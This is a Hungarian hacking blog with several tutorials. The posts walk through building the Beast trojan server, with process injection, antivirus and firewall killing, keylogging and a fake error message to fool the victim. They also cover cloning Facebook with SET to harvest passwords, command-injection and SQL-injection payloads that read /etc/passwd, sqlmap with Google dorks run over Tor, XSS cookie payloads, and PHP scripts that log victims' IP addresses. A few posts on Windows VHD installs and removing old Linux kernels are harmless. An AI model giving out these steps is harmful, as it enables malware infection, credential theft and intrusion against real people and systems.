2013. augusztus 11., vasárnap

Trójai Programok

Először is tisztázzuk hogy mi is az trójai!
Sokan tévesztik össze a féreggel, de a féreg csak pusztít(a fő célja hogy minél több gépet megfertőzzön) és azt hiszik, hogy a trójai is. Viszont a trójai sokkal hasznosabb, mert tudjuk irányítani a fertőzött gépet vele. A féreg is hasznos de csak azok számára akik rombolni akarnak... :D
Na akkor el is lehet kezdeni. A programnak amit most mutatni fogok a neve: The Beast Trojan. Innen lehet letölteni:
https://sites.google.com/site/trojandownloads/beast-2-07
Indítsd el, és kattints a Build Server gombra ezzel lehet csinálni 1 trójai szervert amin keresztül az áldozat gépét fogjuk irányítani.
Ezután előjön egy ablak ahol konfigurálhatjuk a szerverünket. Először is be kell állítani egy jelszót. Erre azért van szükség hogy ne tudjon akárki csatlakozni a szerverre csak mi. Aztán a portot, amin keresztül fog kommunikálni a szerver az áldozat géppel. Be lehet még állítani hogy injectálja magát egy másik processbe. (Úgy fog tűnni mintha az explorer.exe futna a Feladatkezelőben)
Valahogy így állítsátok be,hogy ne legyen feltűnő,aztán kattints a Notifications gombra és ott kell megadni az ip címedet,hogy kapcsolatot tudjon csinálni a két gép között ha remote hoston akarod futtatni akkor használd a wan ip-det. :)
Ezután kattints a Startup gombra és ha át akarod írni,hogy hogyan hozza létre magát a registrybe akkor itt megteheted.. :)
Ezután kattints a(z) Av-FW Kill-re. Ez nem csinál sok mindent csak kinyírja az antivírust meg a tűzfalat.
Ha akarod akkor jelöld be. Utána kattints a Misc gombra és ott beállíthatod,hogy engedélyezze e a keyloggolást vagyis, hogy rögzítse a lenyomott billentyűket(vagy ne). A Fake Error Message azért jó mert amikor elindítja a programot akkor kell valami ok hogy ő miért nem kap semmilyen interakciót. Ezt így lehet beállítani: Katt a Configure gombra a fake error message alatt és állítsd be,hogy milyen hibát dobjon fel mikor elindul a trójai szerver.
A test gombbal lehet tesztelni a jelentést, aztán kattints az Exe iconra és válassz egy ikont ha nem tetszenek az ikonok akkor tallóz be egyet a Choose Icon gombbal  és kattints a Save Server gombra. Oda fogja tenni a szervert ahol a beast van.

Ha ez megvan meg kell szerezni az áldozat ip címét és ha megvan és elindította fel lehet rá csatlakozniés akkor elég sok mindent lehet például keyloggert atkiválni cd-romot nyitogatni stb :)
Itt egy általam készített videó tutorial:

2013. augusztus 10., szombat

A Command Execution támadás

Ez az a fajta támadás amikor az adott sérülékeny gépen/szerveren megpróbálunk parancsokat futtatni. Például egy kereső mezőn keresztül... A DVWA-t fogom megint használni. :) Nem írom le hogy mire van kitalálva mert már írtam róla. (én is meg zerocool is) :)
Kezdjük is el. Van egy funkció benne ami pont erre való, próbáljuk ki..
Van itt egy mező ez egy pinger. Írd be a célpont url-t vagy ip címet és csempésszünk bele a kódot. :)
Például: google.hu ; ls
És ki listázza mik vannak abban a mappában ahol a ping fut. :)
Tudtommal a hackerek nem fájl listákra vadásznak, hanem a jelszavakra. Ha gyenge az oldal akkor, meg lehet nézni a jelszó fájlok tartalmát is! :)
google.hu && cat /etc/ passwd és ha minden jó kiadja a jelszófájl tartalmát: 
Mondjuk lehet úgy is, hogy megpróbáljuk megkeresni a .htpasswd-t ami tárolja az összes felhasználót az oldalon ehhez kell kis türelem meg minden. :)
Próbáljuk meg először így google.hu && cat /cgi-bin/.htpasswd mindig máskép kell próbálkozni mert nem mindenhol van egy helyen..
Ezután más dolgunk sincs csak visszafejteni őket.. :)
Ezt is megmutatom hogy hogy kell ezt a htpasswd-t visszafejteni. :)
Szükség van egy jelszótörőre. A john the ripper pont jó. Meg egy wordlist is kelleni fog. 
./john --wordlist=elérési út/word.txt találatok.txt
És ha jó wordlistet használtunk akkor valószínűleg megtalálta a jelszavakat....
Ennyi lenne remélem érthető volt kösz, hogy elolvastad! :)

2013. augusztus 9., péntek

Sqlmap


Nézzétek meg a videót! (Itt vannak a lépese)
Ma a sqlmap-ről lesz szó. A DVWA-t (Damn Vulnerable Web Application) fogom megtámadni. (Majd később erre is kitérek egy videóban hogy hogy tudjátok ezt feltelepíteni) Szval vágjunk is bele:
Mivel én Kali linuxot használok ezért a sqlmap elérési útvonala itt van:

/usr/share/sqlmap/

backtrack-en:

/pentest/database/sqlmap/

Így tudod futtatni: python sqlmap.py

Lássuk hogy hogy is kell ezt használni:

sqlmap -h

sqlmap
-u 'url' <-ezzel adjuk meg a támadni kívánt URL címet

-g [google_dork] <- ez egy nagyon jó kis opció, a google-t használjuk hogy sebezhetőségeket találjunk.. pl. inurl:news.php?id=1 ezt megadjuk paraméternek és a sqlmap megkeresi nekünk a sebezhető oldalakat... Itt egy nagy lista google dorkokból:
http://pastebin.com/WkysZt7J
Itt egy mégnagyobb:
http://pastebin.com/Tdvi8vgK
(Mindenki csak saját felelősségére használja, a más oldalakban való kártevés bűncselekménynek minősül!)
Ezt most nem fogjuk használni!

--cookie='cookie; security=low/medium/high;' <-ezzel tudunk megadni egy HTTP Cookie fejlécet

-a, --all <-mindent kiszed az adatbázisból

--current-user <-visszadja az adatbázis jelenlegi felhasználóit

--current-db <-visszaadja a jelenlegi adatbázis

--dump <-Ezzel tudjuk kidumpolni az adatokat a megadott adatbázisokból

--tor <- Tor-t használunk a lekérdezések közben (egy kicsit lassabb lesz viszont megéri mert nem fognak ránk találni utána)

Most feltöri a sqlmap alapértelmezett jelszólistájával a hash-eket... Meg tudunk adni mi is jelszólistát...

Láthatjuk hogy meg is találta az összes jelszót!

Ennyi lenne... 

2013. augusztus 8., csütörtök

SQL Injection

Mi is az Sql injection?
Az Sql injection egy olyan támadás,amivel sérülékeny sql szerverekből lehet kibányászni hasznos információkat pl.: felhasználóneveket, jelszavakat, jelszó hasheket stb...
De mielőtt elkezdenénk tisztázzunk valamit. Ez a támadás nem minden oldalnál működik mert nem minden SQL szerver sérülékeny csak az a sérülékeny ahol lusta volt az admin.  
A cikkben én a DVWA-t fogom támadni. (A DVWA letölhető innen.) Kezdjük is el. A Sql Injection mezőnél,van egy kis sor ahova be kell írni egy id-t most nem fogunk szabályoskodni hanem lopjunk id-t egyből. :D
Írd be, hogy  or 1=1 # és láss csodát ha hibás az sql szerver akkor vissza fog adni pár jó dolgot de ezzel simán be lehet lépni 1 sql szerverbe or 1=1 belépésnek és jelszónak beírod és akkor ha hibás be fog engedni.
Most azt írtam be,hogy or 1=1 # és sok mindent adott :D
Ezután próbáljunk meg még 1 dolgot ha tudod,hogy sebezhető írd be ezt 4' order by 1 # és akkor vissza fogja adni a negyedik user-t az admin által mert by 1 # és az admin az első mindig :D
Most ha meg akarod tudni pontosan milyen típusú az Sql szerver és adatbázis és nincs kedved elővenni az nmapot akkor irb be ezt: ' and 1=1 union select database(),version() #
Most meg kellene tudni milyen táblák vannak az adott szerveren ehhez írd be ezt:' and 1=1 union select null,table_schema from information_schema.tables #
Most meg is vannak a táblák de elég ez nekünk? NEM ! :D
Nézzük meg milyen user használja azt a táblát. Ehhez ezt kell beírni ' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='kiválasztott tábla' #
Ezután meg lehet nézni azt, hogy milyen felhasználók vannak a kiválaszott adatbázisban. Nézzük is meg. Írd be, hogy ' and 1=1 union select first_name,password from adabázis.users #
Még lehet fájlokat beolvasni mondjuk el lehet lopni vele a rendszer felhasználók hasheit és azt visszafejteni és akkor már be lehet jelentkezni s sok mindent csinálni. Írd be ezt és ha nincs megtagadva a hozzáférés akkor tied a jelszófájl tartalma. :)
' union SELECT 1, load_file('/etc/passwd') # ha ez megvan és kiadta vissza lehet őket fejteni most ha még nem volt elég akkor lopjunk pár usert az adatbázisból :)
' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'adatbázis' #
De ezt kézzel szerintem nem kényelmes csinálni vannak különböző eszközök amik meg tudják tenni ezt helyettünk.... :)

2013. augusztus 6., kedd

A Cross Site Scripting támadás alapjai

Szóval a Cross Site Scripting elég gyakori támadás és egyre gyakrabban fordul elő mint az Sql Injection. A Cross Site Scriptinget, XSS-nek is nevezik és elég sok az oldal amin lehet gyakorolni. De van DVWA(Damn vulnerable web application) nevű program amin ilyeneket (is )lehet gyakorolni
Akkor lehet is kezdeni. Telepítsd fel a DVWA-t vagy találj valami oldalt de fontos,hogy ne tegyél kárt semmiben én most olyan oldalon csinálom ahol nem marad ott amit csinálok 1 frissítés és eltűnik.Mivel is kell ezt kezdeni? Azzal kell kezdeni, hogy teszteljük hogy van-e xss sebezhetőség az oldalon. Írd be valahova például keresőbe vagy commentbox-ba <script>alert("XSS");</script> és ha azt kapod vissza amit a képen látsz akkor lehet próbálkozni tovább.. :)
Ha sebezhető az oldal akkor nagyon sok mindent lehet csinálni. Pl.:Be lehet tenni egy kiválasztott képet az oldalra. Ezt így lehet megoldani: <img src=kép url>
A felhasználók cookie-ját is el lehet így lopni... :)
<script>alert(document.cookie)</script>

És mint láthatjuk meg is jelent.
Lehet még sok mindent csinálni, de most csak az alapokat írtam le...Nem véletlenül lett a cikk címe: "A Cross Site Scripting támadás ALAPJAI" :D

2013. július 30., kedd

Windows 8 telepítése VHD-s ként!

Na szóval... Mi is ez a VHD? Ez egy virtuális merevlemez, amit windowsban egyszerűen el tudunk készíteni. Magyarul azt fogjuk most csinálni hogy létrehozunk egy virtuális meghajtót, és arra fogjuk feltelepíteni a windows 8-unkat. Azért jó ez a módszer mert az egész fájlrendszer egy fájl-ban fog tárolódni, nem kell semmit vacakolni a particionálással csak létrehozod a vhd felrakod a win8-at és utána tudsz róla boot-olni!
Amire szükségünk lesz:
1.Windows  7 vagy újabb operációs rendszer.
2.Imagex (ezzel fogjuk a vhd-re telepíteni az oprendszert) Innen tudod letölteni
3.ISO mountolására alkalmas program (pl. Daemon Tools)
4.Egy Windows 8 képfájl
Ha minden meg van akkor hozzá is tudunk kezdeni!
Először is a Számítógép ikon-on jobb klikk, és katt a Kezelés-re.

Kattintsunk a Lemezkezelésre, egy kicsit várni kell amíg betöltődnek a lemezek. Ha betöltődtek akkor kattintsunk a Lemezkezelésen jobb klikkel, és utána a Virtuális merevlemez létrehozása menüpontra.

Itt megadhatjuk a virtuális merevlemez helyét, méretét, és azt hogy dinamikus bővülő legyen a tárhely vagy rögzített méretű.

Ha a beállításokat elvégeztük készen is van a virtuális merevlemezünk, és meg is fog jelenni a listában. A következő lépés hogy a Lemez [száma]-n jobb klikk, és Lemez inicializálása.

Ha nem az MBR-en lenne akkor állítsuk át, ha ott van akkor csak nyomjunk egy OK-ot. 

Ezután a fekete részen kell jobb klikk, utána Új egyszerű kötet. Bejön egy "varázsló". Tovább, itt be tudjuk állítani a kötet méretét, jobb ha nem piszkáljuk Tovább. Itt be tudjuk állítani hogy mi legyen a kötet betűjele. Az én esetemben ez W lesz. A következő oldalon a formázás beállításait, és a kötet nevét kell megadni. Ezután Befejezés.
Ezután futtassuk a Parancssort rendszergazdai jogokkal. 

Navigáljunk oda az imagex.exe-hez amit letöltöttünk, és futtassuk az alábbi kódot: imagex.exe /apply f:\sources\install.wim 1 w:\
f:virtuális meghajtó betűjele (amibe a telepítőlemezt mountoltuk be)
w: virtuális merevlemez betűjele
Ha feltelepítette akkor már csak annyi a dolgunk hogy hozzáadjuk az elkészült Windows 8-unkat a boot listához. 
Ezt az alábbi paranccsal tudjuk megtenni: bcdboot [virtuális merevlemezünk betűjele]:\Windows
És kész is vagyunk! Remélem sikerült nektek is megcsinálni, ha valahol elakadtatok kommenteljetek!


Port Scanning

A portok hálózati kommunikációt szolgálnak. A protokollokkal együtt települnek és ezeken be is lehet "hatolni", mert a portokon keresztül tudják irányítani a szervert. Legyen az ftp, ssh vagy akármi.
És ezeken a portokon be lehet jelentkezni. Egy penetration testingnél(behatolás tesztelésnél) nagyon fontos a port scan lépés mert így tudjuk meg hogy milyen szolgáltatások futnak az adott host-on.
Szóval akkor most egy kis alap scanning-et fogok leírni. Az Nmap nevű programmal fogunk "dolgozni". Az Nmap-nak van grafikus felülete amit Zenmap-nak hívnak.Viszont mi most a parancssoros változatot fogjuk használni. (aki akarja használja a grafikus változatot) Vágjunk is bele. Válassz ki egy oldalt (port scannért még nem vittek el senkit :D) és ird be, hogy nmap [célpont]
Nmap-nak adhatsz ip címet is mert ő azt is tudja scannelni nem "paraszt" port scanner a legjobbak közé tartozik. Ha kész a scan akkor valami hasonló fogsz látni.
Hát igen ez a gondatlan rendszergazda nem törődik a rendszerrel nyitva hagy elég sok mindent lefogadom, hogy nincs rendes tűzfal sem.
Van az nmap-nak pár funkciója amivel ki lehet deríteni, hogy milyen OS(operációs rendszer) fut a szerveren,ehhez írd be,hogy nmap -A [célpont]

Ez a funkció az alkalmazások verziószámát is tudja detektálni. Ha csak speciálisan OS Scan-t akarunk csinálni akkor van erre is lehetőségünk: nmap -O [célpont]
Még egy valamit mutatok ami alap az agresszív scan mód ami szinte mindent detektál, ehhez azt kell írni, hogy nmap -T4 -A -v [célpont] :)
Próbáljátok ki ;)

Nem használt linux kernelek eltávolítás

Szóval, hogy néz ki egy általános nemtörődöm linux felhasználó grub2-je?
 
Most azt fogom leírni, hogy hogy kell megszabadulni ezeketől a régi nem használt kernelektől nem kell hozzá letölteni semmilyen eszközt hanem ami megcsinálja az van alapból minden linuxon. :)
Először is írd be, hogy uname -r és kijön a kernel amiben éppen "tevékenykedsz".  :)
Ha ez megvan,akkor kérni kell egy kernel listát és majd a nem kívánatos
kerneleket eltávolítani. Ehhez írd be, hogy dpkg --list | grep linux-image
Ez a parancs rákeres a kernelekre,és valami hasonlót fogsz látni. :)
Most be kell irni a parancsot ami eltávolítja a kiválasztott kernel.
sudo apt-get purge linux-image-x.x.x-xx-generic az x-ek helyére kell irni a kernel "számát" (nooboknak) :)
Példa:
Ezután frissíteni kell a grub2-t,hogy ő is tudja azért,hogy mi van és mi nincs :D
Írd be, hogy sudo update-grub2. Ha ez megvan akkor frissült minden és nincs annyi sok kernel de kettőt nem árt hagyni mert ha az egyiknél kernel pánik van, akkor a másikkal be tudj jelentkezni.
Ennyi lenne remélem érthető volt kösz, hogy elolvastad :)

2013. július 29., hétfő

Adathalászat(Phising)

Mi is ez?
Ebben a támadásban annyit csinálunk hogy lemásolunk valamilyen oldalt, és átírjuk a post paramétert, hogy amikor beüti a felhasználónevét és jelszavát az áldozat, akkor ne a szervernek küldje el őket hanem nekünk...
A SET(Social Engineer Toolkit) nevű programot fogjuk használni. Backtrack-en alapból van.
Navigáljunk a /pentest/exploits/set mappába.
Ha nem lenne itt valamilyen okból fogva akkor így tudjuk letölteni:
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
Ezután indítsuk el!
./setoolkit
Írj be egy 1-est vagyis ez a (Social-Engineering Attacks)
aztán pedig írj be egy 2-est ez a (Website Attack Vectors)
ez után írj be egy 3-ast (Credential Harvester Attack Method)
és ez után jön a finálé még írj be egy 2-est (Site Cloner)
most írd be az ip cimed a local-t vagy a wan ip-t.
és ez után írd be az oldal-t amit klónozni akarsz pl: https://www.facebook.com (tudjátok https vagy http nem mindegy..)
Ezután elkészíteni nekünk a klónozott oldalt.   és most ha valaki be fog jelentkezni rajta akkor megvan a jelszó..
Videó:

IP cím szerzés PHP szkripttel

Mi is az ip cím?
Az ip cím magában csak az Internet Protocol rövidítése, avagy egy egyedi számítógép azonosító szám ami megkülönböztet két gépet egymástól. :) (Bővebben)
A PHP pedig egy web programozási nyelv, olyan mint a HTML csak (sokkal) fejlettebb. Ezekkel a fájlokkal fogunk dolgozni a cikk során:
http://www.mediafire.com/download/nvv3xz42vejjn6n/scriptek.zip
A csomagban két PHP scriptet találunk. Nézzük hogy mire jók, és hogy lehet őket használni.
Az első dolgunk az hogy feltöltjük a csomagban levő szkripteket egy tárhelyre például: 000webhost.com-ra, de saját szerverre is lehet.
Az első script csak az ip címet és a megtekintés időpontját menti le.
A második script már több mindent tud. :) Az ip cím mellet feljegyzi az operációs rendszer típusát, és a böngésző típusát is. :)
Az áldozat mindebből ennyit lát:

Demonstrációs videó: